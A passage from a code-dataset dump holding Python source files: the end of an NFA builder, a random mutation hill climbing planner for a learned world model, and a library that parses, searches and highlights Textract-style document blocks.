[n1.debut]\n if t.nom == 'ETOILE':\n s0.epsilon.append(s1)\n n1.fin.epsilon.extend([s1, n1.debut])\n n1.fin.est_fin = False\n nfa = NFA(s0, s1)\n pile_nfa.append(nfa)\n\n def gerer_interrogation(self, t, pile_nfa):\n n1 = pile_nfa.pop()\n n1.debut.epsilon.append(n1.fin)\n pile_nfa.append(n1)\n\n","sub_path":"Automate.py","file_name":"Automate.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"407948489","text":"\"\"\" RMHC for simulated environments \"\"\"\n# Copyright (c) 2020, - All Rights Reserved\n# This file is part of the Evolutionary Planning on a Learned World Model thesis.\n# Unauthorized copying of this file, via any medium is strictly prohibited without the consensus of the authors.\n# Written by Thor V.A.N. Olesen & Dennis T.T. 
Nguyen .\n\nimport copy\nimport torch\nimport numpy as np\nfrom concurrent.futures import as_completed\nfrom planning.interfaces.individual import Individual\nfrom tuning.evolution_handler import EvolutionHandler\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom planning.interfaces.abstract_hill_climb_simulation import AbstractRandomMutationHillClimbing\nfrom tqdm import tqdm\n\n\nclass RMHC(AbstractRandomMutationHillClimbing):\n def __init__(self, horizon, max_generations, is_shift_buffer, is_rollout, max_rollouts=None, rollout_length=None,\n is_parallel_rollouts=False):\n super().__init__(horizon, max_generations, is_shift_buffer, is_rollout, max_rollouts, rollout_length)\n self.current_elite = None\n self.latent = None\n self.hidden = None\n self.elite_history = []\n self.is_parallel_rollouts = is_parallel_rollouts\n\n self.evolution_handler = EvolutionHandler(self.horizon)\n self.mutation_operator = self.evolution_handler.get_mutation_operator()\n\n def search(self, environment, latent, hidden):\n self.latent = latent\n self.hidden = hidden\n self.elite_history = []\n self.current_elite = self._initialize_individual(environment)\n self._evaluate_individual(self.current_elite, environment)\n self._append_elite(self.current_elite)\n\n for generation in range(self.max_generations):\n self._step_generation(generation, environment)\n\n best_action = self.current_elite.action_sequence[0]\n return best_action, self.elite_history\n\n def _step_generation(self, generation, environment):\n mutated_individual = self._mutate(environment, self.current_elite, generation)\n self.current_elite = self._select_best_individual(self.current_elite, mutated_individual, environment)\n\n def _initialize_individual(self, environment):\n if self.is_shift_buffer and self.current_elite is not None:\n individual = self._shift_buffer(environment, self.current_elite)\n else:\n action_sequence = []\n for _ in range(self.horizon):\n action_sequence.append(environment.sample())\n individual = Individual(action_sequence)\n individual.fitness, individual.age = 0, 0 # reset across generations\n return individual\n\n def _select_best_individual(self, current_elite, mutated_individual, simulated_environment):\n self._evaluate_individual(mutated_individual, simulated_environment)\n elite = mutated_individual if mutated_individual.fitness > current_elite.fitness else current_elite\n self._append_elite(elite)\n return elite\n\n def _shift_buffer(self, environment, individual):\n individual.action_sequence.pop(0)\n individual.action_sequence.append(environment.sample())\n return individual\n\n def _rollout(self, environment, latent, hidden, is_parallel=True):\n total_reward = 0\n if is_parallel:\n with ThreadPoolExecutor() as executor:\n rollout_futures = [executor.submit(lambda args: self._single_rollout(*args), [environment, latent, hidden]) for _ in range(self.max_rollouts)]\n total_reward += sum([rollout_future.result() for rollout_future in as_completed(rollout_futures)])\n else:\n total_reward += sum([self._single_rollout(environment, latent, hidden) for _ in range(self.max_rollouts)])\n\n return total_reward / self.max_rollouts\n\n def _single_rollout(self, environment, latent, hidden):\n is_done = False\n total_reward = 0\n rollout_step = 0\n rollout_latent = latent\n rollout_hidden = hidden\n\n while not is_done and rollout_step < self.rollout_length:\n action = environment.sample()\n rollout_latent, reward, is_done, rollout_hidden = environment.step(action, rollout_hidden, rollout_latent,\n 
is_simulation_real_environment=False)\n            total_reward += reward\n            rollout_step += 1\n        return total_reward\n\n    def _mutate(self, environment, current_elite, generation):\n        individual = copy.deepcopy(current_elite)\n        self.mutation_operator(environment, individual)\n        individual.age, individual.fitness = generation + 1, 0\n        return individual\n\n    def _evaluate_individual(self, individual, environment):\n        with torch.no_grad():\n            is_done = False\n            total_reward = 0\n            latent = self.latent\n            hidden = self.hidden\n\n            for action in individual.action_sequence:\n                if not is_done:\n                    latent, reward, is_done, hidden = environment.step(action, hidden, latent, is_simulation_real_environment=False)\n                    total_reward += reward\n                else:\n                    break\n\n            if self.is_rollout and not is_done:\n                total_reward += self._rollout(environment, latent, hidden, self.is_parallel_rollouts)\n            individual.fitness += total_reward\n\n    def _append_elite(self, individual):\n        # compare integers by value, not identity ('is' on ints is unreliable)\n        is_new_elite = len(self.elite_history) == 0 or individual.age != self.current_elite.age\n        self.elite_history.append((individual.fitness, is_new_elite, individual.action_sequence))\n","sub_path":"planning/simulation/random_mutation_hill_climbing_simulation.py","file_name":"random_mutation_hill_climbing_simulation.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"463876610","text":"# Blocks is built upon list\nfrom collections import UserList,UserDict\nimport json\nimport re\nfrom functools import reduce\nfrom itertools import compress\n\ndef is_iterable(obj):\n    \"\"\"\n    Check if an object is iterable\n    \"\"\"\n    try:\n        iter(obj)\n    except Exception:\n        return False\n    else:\n        return True\n\ndef clean_text(text):\n    \"\"\"\n    Clean text:\n    1. Collapse all whitespaces\n    2. Get only characters and digits and space\n    3. 
strip whitespaces\n \"\"\"\n text = re.sub('\\s+', ' ', text)\n text = re.sub('[^A-Za-z0-9 ]+', '', text)\n return(text.strip())\n\ndef get_xy(p):\n try:\n x = p[0]\n y = p[1]\n except KeyError:\n x = p[\"X\"]\n y = p[\"Y\"]\n return(x,y)\n\nclass Block(UserDict):\n def __init__(self,d):\n super().__init__(d)\n self.parsed = None\n self.parse_error = False\n self.parse_error_message = None\n\n def __repr__(self):\n string = self.__class__.__name__ + \"(\" + self.data.__repr__() + \")\"\n return(string)\n\n @property\n def parsed_text(self):\n if self.parsed:\n return(str(self.parsed))\n else:\n return(None)\n \n @property\n def width(self):\n return(self.get([\"Geometry\",\"BoundingBox\",\"Width\"]))\n\n @property \n def height(self):\n return(self.get([\"Geometry\",\"BoundingBox\",\"Height\"]))\n\n\n def get(self,key,default=None):\n \"\"\"\n Get value using key(s) defined in args.\n key: key or a list of key.\n default: default value when key is not found\n \"\"\"\n if is_iterable(key) and type(key) != str:\n v = self.data.copy()\n for k in key:\n v = v.get(k)\n if v is None:\n return(default)\n return(v)\n else:\n return(self.data.get(key))\n\n def _get_relationship_ids(self,blocks,relationship):\n if relationship == \"CHILD\":\n # case1: no relationship\n if self.get([\"Relationships\"]) is None:\n ret = []\n message = None\n return((ret,message))\n children = [x for x in self.get([\"Relationships\"]) \\\n if x[\"Type\"] == \"CHILD\"]\n # case2: no CHILD as key\n if len(children) == 0:\n ret = []\n message = \"Block has zero CHILD in Relationships\"\n return((ret,message))\n # get ids\n children_ids = children[0].get(\"Ids\")\n # case3: length of children is 0\n if children_ids is None:\n ret = []\n message = \"Block doesn't have CHILD Ids\"\n return((ret,message))\n return((children_ids,None))\n elif relationship == \"VALUE\":\n key = [x for x in self.get([\"Relationships\"]) if x[\"Type\"] == \"VALUE\"][0]\n key_ids = key.get(\"Ids\")\n if key_ids:\n return((key_ids,None))\n else:\n message = \"VALUE not found in Relationships\"\n return(([],message))\n else:\n raise ValueError(f\"Relationship {relationship} is not valid.\")\n\n def _get_text_by_relationship(self,blocks,relationship):\n # works for CELL, KEY_VALUE_SET\n if not self.get(\"BlockType\") in [\"CELL\",\"KEY_VALUE_SET\"]:\n raise ValueError(\n f\"Error at Block: {self['Id']} \"\n \"This method only works for CELL and KEY_VALUE_SET.\"\n )\n children_ids,message = self._get_relationship_ids(blocks,relationship)\n if message:\n self.parse_error = True\n self.parse_error_message = message\n if len(children_ids) == 0:\n return(\" \")\n parsed = []\n for cid in children_ids:\n child_block = blocks.filter_by(\"Id\",cid)\n if len(child_block) == 0:\n raise ValueError(f\"Could not find CHILD Id:{cid}\")\n child_block = child_block[0]\n if child_block.parsed is None:\n child_block.parse(blocks)\n parsed.append(child_block.parsed)\n return(\" \".join(parsed)) \n\n def parse(self,blocks):\n \"\"\"\n parse this block with blocks. Blocks is needed because Block's children \n are ids of other blocks. 
self.parsed atribute will be available \n after block is parsed\n\n Parameters:\n blocks: Blocks object\n\n How .parsed is stored:\n WORD: stored as str\n LINE: stored as str\n KEY_VALUE_SET:\n - KEY: stored as dictionary: {key:value}\n - VALUE: stored as str\n SELECTION_ELEMENT: stored as str: SELECTED or NOT_SELECTED\n CELL: stored as str\n TABLE: stored as array(list of list) of text\n PAGE: will always store \" \" as parsed.\n\n \"\"\"\n # skip if block is already parsed\n if self.parsed:\n return(self)\n block_type = self.get(\"BlockType\") \n if block_type in [\"LINE\",\"WORD\"]:\n self.parsed = self.get(\"Text\")\n return(self)\n elif block_type == \"SELECTION_ELEMENT\":\n self.parsed = self.get(\"SelectionStatus\")\n return(self)\n elif block_type == \"KEY_VALUE_SET\":\n if self.get(\"EntityTypes\")[0] == \"VALUE\":\n self.parsed = self._get_text_by_relationship(blocks,\"CHILD\")\n return(self)\n elif self.get(\"EntityTypes\")[0] == \"KEY\":\n # get key text\n key_text = self._get_text_by_relationship(blocks,\"CHILD\")\n value_text = self._get_text_by_relationship(blocks,\"VALUE\")\n self.parsed = {key_text:value_text}\n return(self) \n else:\n raise ValueError(f\"unexpected Error for Block:{self.get('Id')}\")\n elif block_type == \"CELL\":\n self.parsed = self._get_text_by_relationship(blocks,\"CHILD\")\n return(self)\n elif block_type == \"TABLE\":\n import copy\n cell_ids,message = self._get_relationship_ids(blocks,\"CHILD\")\n if message:\n self.parse_error = True\n self.parse_error_message = message\n cells = []\n for cell_id in cell_ids:\n cell = blocks.filter_by(\"Id\",cell_id)[0]\n cell.parsed = cell._get_text_by_relationship(blocks,\"CHILD\")\n cells.append(cell)\n # construct empty array, which will be filled later\n max_row = max([x[\"RowIndex\"] + x[\"RowSpan\"] - 1 for x in cells])\n max_col = max([x[\"ColumnIndex\"] + x[\"ColumnSpan\"] - 1 for x in cells])\n array = []\n row = [\"\"] * max_col\n for _ in range(max_row):\n array.append(copy.deepcopy(row))\n \n for c in cells:\n for rownum in range(c[\"RowSpan\"]):\n for colnum in range(c[\"ColumnSpan\"]):\n final_row_index = c[\"RowIndex\"]+rownum-1\n final_col_index = c[\"ColumnIndex\"]+colnum-1\n array[final_row_index][final_col_index] = c.parsed\n self.parsed = array\n return(self)\n elif block_type == \"PAGE\":\n self.parsed = \" \"\n return(self)\n\n # positions\n def point(self,position,otype = tuple):\n \"\"\"\n Get coordinate of a point from the Block.\n\n Parameters:\n position: position for the point in block. 
reference following:\n top left-------top-----top right \n | | |\n left-------center-----right\n | | |\n bottom left---bottom---bottom right\n or\n 0---1---2\n | | |\n 3---4---5\n | | |\n 6---7---8\n otype: output type:list,tuple or dictionary.\n \n Return:\n coordinate of a point.\n \"\"\"\n if position in [0,\"top left\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[0]\n elif position in [1,\"top\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[0]\n p2 = self.get([\"Geometry\",\"Polygon\"])[1]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [2,\"top right\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[1]\n elif position in [3,\"left\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[0]\n p2 = self.get([\"Geometry\",\"Polygon\"])[3]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [4,\"center\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[0]\n p2 = self.get([\"Geometry\",\"Polygon\"])[2]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [5,\"right\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[1]\n p2 = self.get([\"Geometry\",\"Polygon\"])[2]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [6,\"bottom left\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[3]\n elif position in [7,\"bottom\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[2]\n p2 = self.get([\"Geometry\",\"Polygon\"])[3]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [8,\"bottom right\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[2]\n else:\n raise ValueError(f\"Position: {position} is not valid.\")\n\n if otype == dict:\n return(ret)\n elif otype == list:\n return([ret[\"X\"],ret[\"Y\"]])\n elif otype == tuple:\n return((ret[\"X\"],ret[\"Y\"]))\n else:\n raise ValueError(f\"otype {str(otype)} is not valid\")\n\n def get_distance(self,point,shortest=True,dtype=\"d\"):\n \"\"\"\n Get distance from the point to this block.\n\n Parameters:\n point:\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n shortest: whether it's shortest distance or distance to center of the \n other block\n \n Return:\n float. 
Could have negative sign if dtype is d or v.\n \"\"\"\n import math\n # check input\n if dtype not in [\"v\",\"h\",\"d\"]:\n raise ValueError(f\"dtype :{dtype} is not one of d,h or v\")\n # get x,y coordinate of the point\n x,y = get_xy(point)\n \n if shortest:\n top_left = self.point(\"top left\")\n bottom_right = self.point(\"bottom right\")\n dx = max(top_left[0] - x,0,x-bottom_right[0])\n dy = max(top_left[1] - y,0,y - bottom_right[1])\n if dtype == \"d\":\n return(math.sqrt(sum([dx**2,dy**2])))\n elif dtype == \"h\":\n if top_left[0] < x:\n return(-1 * dx)\n else:\n return(dx)\n elif dtype == \"v\":\n if top_left[1] < y:\n return(-1 * dy)\n else:\n return(dy) \n else:\n x0,y0 = self.point(\"center\")\n if dtype == \"d\":\n return(math.sqrt(sum([(x0-x)**2 + (y0-y)**2])))\n elif dtype == \"h\":\n return(x0-x)\n elif dtype == \"v\":\n return(y0-y)\n\n def is_in_radius(self,point,radius):\n \"\"\"\n Check if center of this block is in circle defined by point and radius.\n\n Parameters:\n point:(x,y) or {\"X\":x,\"Y\":y}, center of the circle\n radius: radius of the circle\n\n Return:\n True or False\n \"\"\"\n x,y = get_xy(point)\n x0,y0 = self.point(\"center\")\n if ((x0-x)**2 + (y0-y)**2) <= radius ** 2:\n return(True)\n else:\n return(False)\n\n\n def is_in_rectangle(self,x_min,y_min,x_max,y_max):\n \"\"\"\n Check whether the center of this block is an rectangle.\n\n Parameters:\n block: Block object\n x_min: x coordinate of top left corner of the rectangle\n y_min: y coordinate of top left corner of the rectangle\n x_max: x coordinate of top bottom right of the rectangle\n y_max: y coordinate of top bottom right of the rectangle\n\n Return:\n True or False\n \"\"\"\n x,y = self.point(\"center\")\n x_in = (x >= x_min) and (x <= x_max)\n y_in = (y >= y_min) and (y <= y_max)\n return(x_in and y_in)\n\n # search text\n def _str_process(self,text,ignore_case=True,clean=False):\n \"\"\"\n Process parsed text and text.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n tuple of self.parsed_text and text\n \"\"\"\n if self.parsed:\n parsed_text = self.parsed_text\n else:\n raise ValueError(f\"Block {self['Id']} is not parsed\")\n\n if ignore_case:\n parsed_text = parsed_text.upper() \n text = text.upper() \n\n if clean:\n parsed_text = clean_text(parsed_text)\n text = clean_text(text)\n return(parsed_text,text)\n\n def str_equals(self,text,ignore_case=True,clean=False):\n \"\"\"\n Check is text in current block is identical to text.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n True or False\n \"\"\"\n parsed_text,text = self._str_process(text,ignore_case,clean)\n return(parsed_text == text)\n def str_contains(self,text,ignore_case = True,clean=False):\n \"\"\"\n Check whether current block contains text\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. 
strip whitespaces\n \n Return:\n True or False\n \"\"\"\n parsed_text,text = self._str_process(text,ignore_case,clean)\n return(text in parsed_text)\n\n def str_matches(self,regex,ignore_case=True,clean=False):\n \"\"\"\n Check whether current block partially matches regular expression. Uses \n re.search under the hood.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n True or False\n \"\"\"\n # line below may look strange, it's because process regex doesn't make \n # sense\n parsed_text,_ = self._str_process(\"\",ignore_case=False,clean=clean)\n if ignore_case:\n return(bool(re.search(regex,parsed_text,flags=re.IGNORECASE)))\n else:\n return(bool(re.search(regex,parsed_text)))\n\n def str_dist(self,text,fun,ignore_case=True,clean=False):\n \"\"\"\n Calculate string distance/similarity with text in current block and text.\n\n Parameters:\n text: text to compare\n fun: function in textdistance module\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n Distance or Similarity as defined in textdistance module\n \"\"\"\n if \"textdistance\" not in fun.__module__:\n raise ValueError(\n f\"Function {fun.__name__} is not from textdistance module.\"\n )\n parsed_text,text = self._str_process(text,ignore_case,clean)\n return(fun(parsed_text,text))\n\n # display matched content nicely\n def image(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight this block in source document using PIL\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n\n Return:\n PIL Image Object\n \"\"\"\n from PIL import Image,ImageDraw\n if source is None:\n if image_size is None:\n width, height = 500,500\n else:\n width,height = image_size\n image = Image.new('RGB', (width, height))\n else:\n if type(source) == str:\n image = Image.open(source)\n else:\n image = source\n if image_size is None:\n width, height = image.size\n else:\n width, height = image_size\n image = image.resize(image_size) # resize image\n\n # draw rectangle\n draw = ImageDraw.Draw((image))\n top_left = self.point(\"top left\",dict)\n bottom_right = self.point(\"bottom right\",dict)\n draw.rectangle(\n (\n (top_left[\"X\"] * width,top_left[\"Y\"] * height),\n (bottom_right[\"X\"] * width,bottom_right[\"Y\"] * height)\n ), \n outline =outline\n )\n return(image)\n\n def image_show(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight and show this block in source document using PIL.\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). 
If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source=source,outline=outline,image_size=image_size)\n image.show()\n\n def image_save(self,path,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight this block in source document using PIL, save image to given \n path.\n\n Parameters:\n path: path to save file to.\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source=source,outline=outline,image_size=image_size)\n image.save(path) \n\n\nclass Blocks(UserList):\n def __init__(self, l):\n super().__init__([x if isinstance(x,Block) else Block(x) for x in l])\n self._summary = self._generate_summary()\n\n @property\n def length(self):\n \"\"\"\n Length of Blocks\n \"\"\"\n return(self.__len__())\n \n def _generate_summary(self):\n summary = {}\n count = 0\n for b in self:\n if b[\"BlockType\"] not in summary:\n summary[b[\"BlockType\"]] = 1\n else:\n summary[b[\"BlockType\"]] += 1\n count += 1\n summary[\"LENGTH\"] = count\n return(summary)\n\n def __repr__(self):\n string = self.__class__.__name__ + \"(\" + self.data.__repr__() + \")\"\n return(string)\n\n def __str__(self):\n string = self.__class__.__name__ + \": \" + self._summary.__str__()\n return(string)\n\n \n @staticmethod\n def from_file(path):\n \"\"\"\n Read blocks from JSON file.\n \"\"\"\n with open(path,\"r\") as f:\n d = json.load(f)\n return(Blocks(d[\"Blocks\"]))\n\n @staticmethod \n def from_list(l):\n \"\"\"\n Initialize Blocks from a list of Block objects.\n \"\"\"\n return(Blocks(l))\n \n def map(self,fun):\n \"\"\"\n Apply function to object. Returns a list.\n \"\"\"\n return(list(map(fun,self)))\n \n def get(self,key):\n \"\"\"\n Get Attribute by key. key can be str or list/tuple\n \"\"\"\n return(self.map(lambda x:x.get(key)))\n\n def compress(self,selectors):\n \"\"\"\n Compress Blocks with selectors(list of booleans)\n \"\"\"\n return(Blocks(compress(self,selectors)))\n\n def filter(self,fun):\n \"\"\"\n Filter Blocks with function. Returns Blocks.\n \"\"\"\n return(Blocks(filter(fun,self)))\n\n def filter_by(self,key,value):\n \"\"\"\n filter Blocks by key-value pair in dictionary.\n\n key: str or list of keys for nested key.\n value: str or list\n\n Return:\n Blocks object\n \"\"\"\n return(self.filter(lambda x: x.get(key) == value))\n\n def reduce(self,fun):\n \"\"\"\n Reduce Blocks with function. Does not accept initializer\n \"\"\"\n return(reduce(fun,self))\n\n # parsing logic\n def parse(self,blocks=None):\n \"\"\"\n Parse each block in this Blocks object.\n\n Parameters:\n blocks: blocks to use when parsing. Default to None, which uses this \n Blocks object to parse each block. 
When blocks is provided, use that\n instead.\n\n Return:\n self\n \"\"\"\n blocks = blocks if blocks else self\n for b in blocks:\n b.parse(blocks)\n return(self)\n\n def is_parsed(self):\n \"\"\"\n Whether all items in this Blocks are parsed\n \"\"\"\n for b in self:\n if not b.parsed:\n return(False)\n return(True)\n \n @property\n def parsed(self):\n return(self.map(lambda x:x.parsed))\n\n @property\n def parsed_text(self):\n return(self.map(lambda x:x.parsed_text))\n\n # string functions\n def str_equals(self,text,ignore_case=True,clean=False):\n \"\"\"\n Check is text in current block is identical to text.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n list of booleans\n \"\"\"\n ret = self.map(lambda x:x.str_equals(text,ignore_case,clean))\n return(ret)\n\n def filter_str_equals(self,text,ignore_case=True,clean=False):\n ret = self.compress(self.str_equals(text,ignore_case,clean))\n return(ret)\n\n def str_contains(self,text,ignore_case = True,clean=False):\n \"\"\"\n Check whether current block contains text\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n list of booleans\n \"\"\"\n ret = self.map(lambda x:x.str_contains(text,ignore_case,clean))\n return(ret)\n\n def filter_str_contains(self,text,ignore_case=True,clean=False):\n ret = self.compress(self.str_contains(text,ignore_case,clean))\n return(ret)\n\n def str_matches(self,regex,ignore_case=True,clean=False):\n \"\"\"\n Check whether current block partially matches regular expression. Uses \n re.search under the hood.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n list of booleans\n \"\"\"\n # line below may look strange, it's because process regex doesn't make \n # sense\n ret = self.map(lambda x:x.str_matches(regex,ignore_case,clean))\n return(ret)\n\n def filter_str_matches(self,regex,ignore_case=True,clean=False):\n ret = self.compress(self.str_matches(regex,ignore_case,clean))\n return(ret)\n\n def str_dist(self,text,fun,ignore_case=True,clean=False):\n \"\"\"\n Calculate string distance/similarity with text in current block and text.\n\n Parameters:\n text: text to compare\n fun: function in textdistance module\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n List of Distance or Similarity as defined in textdistance module\n \"\"\"\n ret = self.map(lambda x:x.str_dist(text,fun,ignore_case,clean))\n return(ret)\n\n # functions to filter by position\n def get_distance(self,point,shortest=True,dtype=\"d\"):\n \"\"\"\n Get distance from the point to each block in Blocks.\n\n Parameters:\n point: point of reference\n shortest: whether it's shortest distance or distance to center of the \n other block\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. 
h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n \n Return:\n list of float number. Could have negative sign if dtype is d or v.\n \"\"\"\n ret = self.map(lambda x: x.get_distance(point,shortest,dtype))\n return(ret)\n\n def filter_by_radius(self,point,radius):\n \"\"\"\n Filter Block objects whose center is in circle defined by point and \n radius.\n\n Parameters:\n point:(x,y) or {\"X\":x,\"Y\":y}, center of the circle\n radius: radius of the circle\n\n Return:\n Blocks\n \"\"\"\n ret = self.filter(lambda x: x.is_in_radius(point,radius))\n return(ret)\n\n\n def filter_by_rectangle(self,x_min,y_min,x_max,y_max):\n \"\"\"\n Filter Block objects whose center is in rectangle defined x_min,y_min,\n x_max,y_max\n\n Parameters:\n block: Block object\n x_min: x coordinate of top left corner of the rectangle\n y_min: y coordinate of top left corner of the rectangle\n x_max: x coordinate of top bottom right of the rectangle\n y_max: y coordinate of top bottom right of the rectangle\n\n Return:\n Blocks\n \"\"\"\n ret = self.filter(lambda x:x.is_in_rectangle(x_min,y_min,x_max,y_max))\n return(ret)\n\n # find blocks by positions\n\n def find_near(self,block,distance=None,sign=None,shortest=True,dtype=\"d\"):\n \"\"\"\n Find Block objects near the given block.\n\n Parameters:\n block: Block or block id\n shortest: whether it's shortest distance or distance to center of the \n other block\n distance: positive number. Used to find block objects within distance.\n sign: None, \"-\" or \"+\". When using dtype = h or v. the distance could be \n positive or negative. sign can used to filter blocks onr top/left, \n right/bottom\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n\n Details:\n When not providing distance but specifying sign, it can find blocks on \n top/left/bottom/right of the given block.\n\n Return:\n Blocks\n \"\"\"\n try:\n center = block.point(\"center\")\n bid = block[\"Id\"]\n except AttributeError:\n center = self.filter_by(\"Id\",block)[0].point(\"center\")\n bid = block\n \n distance = distance if distance else 2 # bigger than 1.414\n \n distances = self.get_distance(center,shortest=shortest,dtype=dtype)\n\n if dtype == \"d\":\n ret = self.compress([d <= distance and d > 0 for d in distances])\n else:\n if sign is None:\n ret = self.compress([abs(d) <= distance for d in distances])\n elif sign == \"+\":\n ret = self.compress(\n [d <= distance and d > 0 for d in distances]\n )\n elif sign == \"-\":\n ret = self.compress(\n [abs(d) <= distance and d < 0 for d in distances]\n )\n else: \n raise ValueError(f\"sign must be '+','-' or None, not {sign}\")\n ret = ret.filter(lambda x: x[\"Id\"] != bid)\n return(ret)\n\n def find_between(self,block1,block2):\n \"\"\"\n Find Block objects whose center fall between block1 and block2. 
Between \n means the center falls into the outer rectangle generated by min and \n max points.\n ------------------------\n |-------- |\n ||min | |\n || | ----------|\n |-------- | || \n | | max||\n | ----------|\n ------------------------\n\n Parameters:\n block1,block2: Block object or Id of Block Object\n\n Return:\n Blocks\n \"\"\"\n # get all four points\n try:\n p1 = block1.point(\"top left\")\n p2 = block1.point(\"bottom right\")\n p3 = block2.point(\"top left\")\n p4 = block2.point(\"bottom right\")\n bid1 = block1[\"Id\"]\n bid2 = block2[\"Id\"]\n except AttributeError:\n p1 = self.filter_by(\"Id\",block1)[0].point(\"top left\")\n p2 = self.filter_by(\"Id\",block1)[0].point(\"bottom right\")\n p3 = self.filter_by(\"Id\",block2)[0].point(\"top left\")\n p4 = self.filter_by(\"Id\",block2)[0].point(\"bottom right\")\n bid1 = block1\n bid2 = block2\n points = [p1,p2,p3,p4]\n x_min = min([p[0] for p in points])\n y_min = min([p[1] for p in points])\n x_max = max([p[0] for p in points])\n y_max = max([p[1] for p in points])\n\n ret = self.filter_by_rectangle(x_min=x_min,y_min=y_min,x_max=x_max,\n y_max=y_max)\n ret = ret.filter(lambda x: x[\"Id\"] not in [bid1,bid2]) \n return(ret)\n\n # sort blocks\n def sorted(self,origin = (0,0),shortest = True,dtype=\"d\",reverse=False):\n \"\"\"\n sort blocks by distance to origin. Blocks are always sorted by absolute \n distance regardless of sign.\n\n Parameters:\n origin: Block or a point of reference, default to (0,0) top left corner \n of page. if origin is Block, center of the Block is used as origin\n shortest: whether it's shortest distance or distance to center of the \n other block\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n reverse: sort ascendingly or not\n\n Return:\n Blocks\n \"\"\"\n if isinstance(origin,Block):\n origin = origin.point(\"center\")\n distances = self.get_distance(origin,shortest=shortest,dtype=dtype)\n else:\n distances = self.get_distance(origin,shortest=shortest,dtype=dtype)\n distances = [abs(d) for d in distances]\n s = [x for x,y in sorted(zip(self,distances), key=lambda pair: pair[1])]\n if reverse:\n s.reverse()\n return(Blocks(s))\n\n # find block parent(s)\n def find_parent(self,block):\n \"\"\"\n Find the first parent of block. Returns Block object.\n \"\"\"\n try:\n block_id = block[\"Id\"]\n except Exception:\n block_id = block\n for b in self:\n child_ids = b._get_relationship_ids(self,\"CHILD\")[0]\n if block_id in child_ids:\n return(b)\n return(None)\n\n def find_parents(self,block):\n \"\"\"\n Find all parents of the block. Returns Blocks object.\n \"\"\"\n try:\n block_id = block[\"Id\"]\n except Exception:\n block_id = block\n ret = []\n for b in self:\n child_ids = b._get_relationship_ids(self,\"CHILD\")[0]\n if block_id in child_ids:\n ret.append(b)\n return(Blocks(ret))\n\n # image\n def image(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight Blocks in source document using PIL\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). 
